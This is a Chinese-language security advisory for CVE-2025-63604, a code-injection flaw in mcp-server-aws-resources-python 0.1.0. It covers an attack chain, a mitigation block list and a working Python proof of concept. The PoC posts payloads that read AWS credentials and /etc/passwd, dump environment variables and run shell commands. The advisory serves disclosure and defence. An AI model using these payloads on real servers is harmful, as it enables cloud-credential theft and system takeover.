CVE-2025-63604 mcp-server-aws-resources-python 代码注入漏洞

漏洞信息

漏洞编号

CVE-2025-63604

漏洞类型

代码注入/远程代码执行

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

baryhuang/mcp-server-aws-resources-python

漏洞概述

CVE-2025-63604是baryhuang/mcp-server-aws-resources-python 0.1.0版本中存在的一个严重代码注入漏洞。该漏洞位于execute_query方法中，由于对用户输入验证不足，允许攻击者注入恶意Python代码并执行。漏洞的根本原因在于代码在执行环境中暴露了危险的Python内置函数(__import__、getattr、hasattr等)，并直接使用exec()函数来执行用户提供的代码，而没有进行任何安全过滤或沙箱处理。攻击者无需任何认证即可利用此漏洞，通过构造特定的查询请求，可以实现远程代码执行(RCE)，进而窃取AWS凭证(AWS_ACCESS_KEY_ID、AWS_SECRET_ACCESS_KEY)、访问文件系统、获取环境变量信息，最终可能导致整个系统被攻陷和敏感数据泄露。该漏洞影响使用该库构建的所有AWS资源管理服务，攻击者可绕过安全控制获取对AWS资源的未授权访问。

技术细节

该漏洞的核心问题在于execute_query方法对用户输入缺乏有效验证。代码直接使用Python的exec()函数执行用户提供的代码字符串，将危险的内置函数暴露在执行命名空间中。攻击者可以通过发送精心构造的查询来利用这些暴露的函数：1) 使用__import__函数动态导入任意模块，如os、subprocess等；2) 使用getattr函数获取对象的任意属性，绕过访问限制；3) 使用hasattr函数探测系统环境信息。一旦这些函数被恶意利用，攻击者可以执行系统命令(如通过os.system或subprocess.run)、读取环境变量获取敏感凭证、访问文件系统读取或写入文件。攻击过程完全在服务器端执行，攻击者只需构造特定的HTTP请求或API调用即可，无需任何身份验证或用户交互。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标服务器运行的是baryhuang/mcp-server-aws-resources-python 0.1.0版本的服务

STEP 2

步骤2: 构造恶意查询

攻击者构造包含Python代码的恶意查询，利用暴露的__import__、getattr等内置函数

STEP 3

步骤3: 发送攻击请求

通过HTTP POST请求向/execute_query端点发送恶意payload，无需任何认证

STEP 4

步骤4: 代码执行

服务器端exec()函数执行攻击者注入的代码，绕过安全限制

STEP 5

步骤5: 窃取AWS凭证

利用__import__('os').environ.get()获取AWS_ACCESS_KEY_ID和AWS_SECRET_ACCESS_KEY

STEP 6

步骤6: 系统渗透

通过os.system或subprocess执行系统命令，访问文件系统，完成系统完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-63604 PoC - AWS Credentials Theft
import requests
import json

target = "http://target-server:5000"

# PoC 1: Read AWS credentials from environment variables
payload_creds = {
    "query": "__import__('os').environ.get('AWS_ACCESS_KEY_ID')"
}

# PoC 2: Execute system command to list files
payload_cmd = {
    "query": "__import__('os').system('ls -la /')"
}

# PoC 3: Read sensitive files
payload_file = {
    "query": "open('/etc/passwd').read()"
}

# PoC 4: Get all environment variables
payload_env = {
    "query": "__import__('os').environ"
}

def exploit(payload):
    try:
        response = requests.post(f"{target}/execute_query", json=payload, timeout=10)
        return response.json()
    except Exception as e:
        return {"error": str(e)}

# Execute exploits
print("[*] Stealing AWS credentials...")
print(exploit(payload_creds))

print("\n[*] Reading /etc/passwd...")
print(exploit(payload_file))

影响范围

baryhuang/mcp-server-aws-resources-python 0.1.0

防御指南

临时缓解措施

立即停止使用受影响的mcp-server-aws-resources-python 0.1.0版本，或在应用层添加输入过滤机制，禁止查询中包含__import__、exec、eval、open、system等危险函数和关键字。同时建议使用Web应用防火墙(WAF)对API端点进行监控和防护，及时阻断可疑请求。